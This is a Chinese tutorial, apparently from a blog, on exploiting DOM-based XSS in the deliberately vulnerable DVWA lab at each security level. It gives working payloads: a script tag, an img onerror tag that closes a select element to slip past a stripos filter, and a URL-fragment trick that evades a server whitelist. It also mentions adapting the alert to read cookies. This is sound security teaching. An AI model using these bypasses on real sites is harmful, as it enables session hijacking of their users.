欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

DVWA-DOM型XSS全等级绕过方法

程序员文章站 2022-03-02 23:39:08
DOM型XSS全等级绕过前言一、LOW级别二、Medium级别图片插入语句法三、High级别字符 # 绕过服务端过滤四、Impossible级别前言DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个*的Do...

前言

    DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个*的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说,客户端的脚本程序可以通过DOM来动态修改页面内容,从客户端获取DOM中的数据并在本地执行。基于这个特性,就可以利用JS脚本来实现XSS漏洞的利用。

一、LOW级别

打开dvwa,并将等级设置为low
DVWA-DOM型XSS全等级绕过方法
我们查看源代码

<?php
# No protections, anything goes
?>

    从源代码可以看出,这里low级别的代码没有任何的保护性措施!
观察主页面,可以看到页面的功能是让我们选择默认的语言,但是这里又没有对default参数没有进行任何的过滤。
DVWA-DOM型XSS全等级绕过方法
    因此,我们在这里构造XSS代码,在default参数后面写入脚本,构造访问连接:

http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=<script>alert('Oh_No')</script>

点击之后,我们的 script脚本成功被执行了!
DVWA-DOM型XSS全等级绕过方法
查看网页的源代码即可看出,因为我们的脚本插入到代码中,所以执行了
DVWA-DOM型XSS全等级绕过方法
    同样的,我们可以修改语句,使其弹窗可以获取cookie
DVWA-DOM型XSS全等级绕过方法

二、Medium级别

先查看源代码

<?php
// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}
?> 

    从Medium源代码中可以看到它对default参数的值进行了检查,用了stripos()函数对default参数的值进行了检测是否有<scipt字符,如果有的话,就将default=English。

注意:stripos() 函数是不区分大小写的。具体函数用法请参考:
PHP stripos() 函数.

图片插入语句法

    既然这里过滤了<script,那么我们可以用图片插入语句法:

<img src =1 onerror = alert('dom')>

    当我们访问URL:

http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=<img src =1 onerror = alert('dom')>

    此时没有出现任何的变化,界面没有反应。这个时候查看网页的源代码:
DVWA-DOM型XSS全等级绕过方法
    可以看到我们输入的脚本语句被插入进了value值中,没有插入到option标签的值中,所以我们语句当中的<img>标签就没有起到作用,因此不会弹窗。
我们改进我们的语句,尝试将前面的标签闭合

http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=</select><img src =1 onerror = alert('dom')>

    页面成功出现弹窗:
DVWA-DOM型XSS全等级绕过方法
    查看一下网页的源代码:
DVWA-DOM型XSS全等级绕过方法
    我们还可以直接在English值的后面直接进行拼接:

http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English</select><img src =1 onerror = alert('dom')>

    页面也能直接出现弹窗:

DVWA-DOM型XSS全等级绕过方法
    查看网页源代码:
DVWA-DOM型XSS全等级绕过方法

三、High级别

先查看源代码

<?php
// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}
?> 

    分析High级别源代码,这里先if判断default的值是否为空,如果不为空就用switch语句进行匹配,很明显这相当于设置了白名单,只允许传 default值为EnglishFrenchGermanSpanish 其中一个。

字符 # 绕过服务端过滤

    url中有一个字符为#,该字符后的数据不会发送到服务器端,#后面的内容是对浏览器的操作,不会发送到http请求当中去,从而绕过服务端过滤。
    因此可以这样构造连接:

http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English#<script>alert('high!!!')</script>

    点击提交刷新页面后,出现弹窗:
DVWA-DOM型XSS全等级绕过方法

四、Impossible级别

查看源代码

<?php
# Don't need to do anything, protction handled on the client side
?> 

    意思是不需要做任何事,保护在客户端处理

    尝试修改English为:
<script>alert(‘hello’)</script>
DVWA-DOM型XSS全等级绕过方法
    从上图可以看出框内的值是我们输入的参数的经过URL编码后的数据。
查看网页源代码:
DVWA-DOM型XSS全等级绕过方法
    并没有对我们输入的内容进行URL解码,所以我们输入的任何内容都是经过URL编码,然后直接赋值。因此不存在XSS漏洞。

    我们可以对比LOW级别的网页源代码:
DVWA-DOM型XSS全等级绕过方法

    本站所有文章均为原创,欢迎转载,请注明文章出处: https://blog.csdn.net/weixin_43847838/article/details/111940420.。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。

本文地址:https://blog.csdn.net/weixin_43847838/article/details/111940420